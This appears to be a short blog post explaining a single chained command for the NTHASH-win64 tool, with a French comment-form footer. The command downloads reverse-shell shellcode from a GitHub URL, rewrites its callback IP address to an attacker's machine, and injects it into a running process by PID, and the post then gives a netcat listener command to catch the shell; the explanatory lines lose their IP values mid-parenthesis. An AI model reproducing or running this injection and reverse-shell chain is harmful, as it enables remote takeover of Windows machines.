Juil 312023

NTHASH-win64 /download2hexa /input:https:%2f%2fgithub.com%2ferwan2212%2fNTHASH-FPC%2fraw%2fmaster%2frevshell64.bin| nthash-win64 /replace /old:7F000001 /new:C0A801BE|nthash-win64 /injectcodehexa /pid:996

The above will, in 3 steps :

-download a binary and convert it to its textual hexa form

-replace the default outbound ip ( to the real target ip (here

-inject the shellcode into the memory of the specified pid and execute it

on the remote host : run nc -l -p 4444 (note that you could also replace 4444 with a port of your choice in the shell code)

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>



Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.